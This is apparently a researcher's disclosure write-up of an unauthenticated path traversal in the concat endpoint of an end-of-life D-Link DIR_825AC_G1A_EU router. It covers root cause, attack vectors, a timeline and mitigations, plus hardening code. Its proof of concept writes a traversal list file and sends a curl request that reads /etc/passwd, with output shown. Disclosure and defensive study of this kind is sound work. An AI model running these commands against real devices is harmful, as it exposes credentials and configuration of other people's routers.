Vojtěch Hron / n00bDebugger

Unauthenticated Path Traversal in DIR_825AC_G1A_EU - End-of-Life Device, Unpatched

CVE: Pending

Vendor: D-Link

Model: DIR_825AC_G1A_EU

Version: 1.0.5

Status: End-of-life (EOL) device; report submitted without a response from the vendor

Introduction

I discovered this vulnerability during normal use of my router. A web interface endpoint (concat) accepts a file path as a parameter and loads the file without sufficient input validation. By combining Path Traversal with an Arbitrary File Write (any way of placing a file on the router's file system, see Attack Vectors), it is possible to read arbitrary files from the system without authentication.


Discovery

While logging into the router’s administration interface as usual, I opened the developer tools (F12) out of curiosity and monitored the requests. The concat endpoints containing the file path seemed like an interesting target for Path Traversal:

[Figure 1: concat requests carrying the path parameter, as seen in the browser developer tools]

My first attempt to load a system file returned an empty response with no error message. I found it suspicious that the request went through at all. However, when I requested a non-existent file, the server returned a 404. This confirmed my hypothesis: the server loads the file but cannot process it.

Existing file: [Figure 2: empty response for an existing file]

Non-existent file: [Figure 3: 404 response for a non-existent file]


Analysis of the mechanism

I was curious about the structure of the file the server loads. So I logged in via telnet and started looking for it. Due to the limited environment, I had to create my own command that the restricted shell could run:

$ ls -R / 2>/dev/null | grep -C 5 "lib_js_list"
[...]
/srv/anweb/apps/admin:
templates
pages
modules
lib_js_list
js_list
index.html
img
global_js_list
general_css_list

The file contents confirmed my hypothesis - the router loads a list of relative paths and combines their contents into a single response:

$ cat js_list
apps/admin/app.js
apps/admin/modules/history.js
apps/admin/modules/root_scope_interface.js
apps/admin/modules/snapper.js
apps/admin/modules/auth_interface.js
[...]

Paths in the file are relative to the web application's working directory (presumably /srv/anweb/, which the root cause analysis below confirms as the fixed prefix), not to the file system root. Path traversal sequences, in the request parameter or in the list file itself, bypass this restriction.


Proof of Concept

Creating a custom list file containing a path traversal sequence in the /tmp directory via telnet:

$ echo ../../../../../../../../etc/passwd > /tmp/POC

A request that references the newly created list file through the path parameter and returns the contents of /etc/passwd:

$ curl "http://192.168.0.1/concat?type=js&path=../../../../../../../../../../tmp/POC"
admin:[...]:0:0:root:/:/bin/sh
nobody:x:99:99:nobody:/:/bin/false
ftp:x:500:500:ftp:/mnt:/bin/false

Root Cause Analysis

The vulnerability arises due to insufficient sanitization of user input. To identify the exact location of the issue, I reverse-engineered the anweb binary (the router’s web server) in IDA Pro.

The MIPS architecture was new to me and required additional research, but thanks to decompilation and comments in the code, I was able to identify the concat_end_point function, which processes HTTP requests for the given endpoint.

This function then calls get_full_path, which constructs the path to a file based on user input. The resulting path is created by concatenating a fixed prefix /srv/anweb/ with the user’s unvalidated input, without any sanitization or canonicalization.

Relevant part of the get_full_path function:

[Figure 4: decompiled get_full_path, concatenating the fixed prefix /srv/anweb/ with the request parameter]

Relevant part of the concat_end_point function:

[Figure 5: decompiled concat_end_point, calling get_full_path on the user-supplied path]
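To make the root cause concrete, here is an added example of my own, not the anweb code (which I only know from the decompilation described above): the unchecked concatenation the page attributes to get_full_path, beside a lexical canonicalization that rejects any path climbing above /srv/anweb/. The function names, the segment-stack limit and the error convention are assumptions; the same check has to run on the ?path= parameter and on every line of the list file, since the PoC places the traversal sequence in the latter.

```c
#include <stdio.h>
#include <string.h>

#define WEB_ROOT "/srv/anweb/"   /* fixed prefix seen in get_full_path on the page */

/* Unchecked concatenation, as the page describes get_full_path (reimplemented
 * here as an assumption, not the decompiled code): "../" walks out of WEB_ROOT. */
int vulnerable_full_path(const char *user_path, char *out, size_t outlen)
{
    int n = snprintf(out, outlen, WEB_ROOT "%s", user_path);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Hardened form: resolve the relative path lexically, segment by segment, and
 * reject anything that would climb above WEB_ROOT. Both the ?path= parameter
 * and every line read from a *_list file should pass through this before any
 * file is opened. Returns 0 and writes the canonical path, or -1 on rejection. */
int safe_full_path(const char *user_path, char *out, size_t outlen)
{
    const char *segs[32];   /* stack of accepted segments (hypothetical limit) */
    size_t lens[32];
    int depth = 0;
    if (user_path == NULL || user_path[0] == '/')
        return -1;                            /* absolute paths are never valid here */
    for (const char *p = user_path; *p; ) {
        const char *end = strchr(p, '/');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0 || (len == 1 && p[0] == '.')) {
            /* "a//b" or "./": no effect on the resolved path */
        } else if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (depth == 0) return -1;        /* ".." past WEB_ROOT: traversal */
            depth--;
        } else {
            if (depth == 32) return -1;
            segs[depth] = p; lens[depth] = len; depth++;
        }
        p = end ? end + 1 : p + len;
    }
    if (depth == 0) return -1;                /* resolves to the root dir, not a file */
    size_t used = strlen(WEB_ROOT);           /* rebuild the canonical path */
    if (used >= outlen) return -1;
    memcpy(out, WEB_ROOT, used);
    for (int i = 0; i < depth; i++) {
        if (used + lens[i] + 2 > outlen) return -1;
        memcpy(out + used, segs[i], lens[i]); used += lens[i];
        out[used++] = (i + 1 < depth) ? '/' : '\0';
    }
    return 0;
}
```

The lexical check deliberately does not follow symlinks; on a system where the web root may contain symlinks, a realpath-based check on the opened file adds the second layer.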


Attack Vectors

The vulnerability requires that the file containing the custom path list be accessible on the router's file system. I have identified several ways to achieve this:

1. Samba (NAS functionality)

The router supports file sharing via Samba. An attacker with access to the Samba server can upload their own file. The default configuration does not allow this, and the attacker must know the system path to the shared folder.

2. Anonymous FTP

The router allows anonymous FTP logins. The default configuration does not enable this feature.

3. USB Flash Drive (most significant vector)

The router names USB devices deterministically (/mnt/usb1_0) because it has a single USB port, so the path of a file on an inserted drive is predictable. An attacker with physical access can therefore place a list file on a USB drive and read any file without any authentication.


Impact

A successful exploit allows reading of arbitrary files from the system without authentication, including:

  • /etc/passwd
  • Router configuration files

Timeline

February 21, 2026 - Vulnerability discovered

February 21, 2026 - Reported to vendor (D-Link)

April 22, 2026 - Deadline passed without response

May 23, 2026 - Publication (EOL device)


Recommendations

Users who actively use this device should consider replacing it with a model supported by the manufacturer. If replacement is not possible, isolate the administration interface so that it is not reachable from the internet or from untrusted networks: even though the vulnerability I found requires write access to the file system, an attacker might gain that access through another vulnerability. In addition, disable Samba and FTP and prevent physical access to the USB port.


Note: I used AI exclusively for structural design and consultation recommendations while writing this article. The research and content themselves are the result of my own work.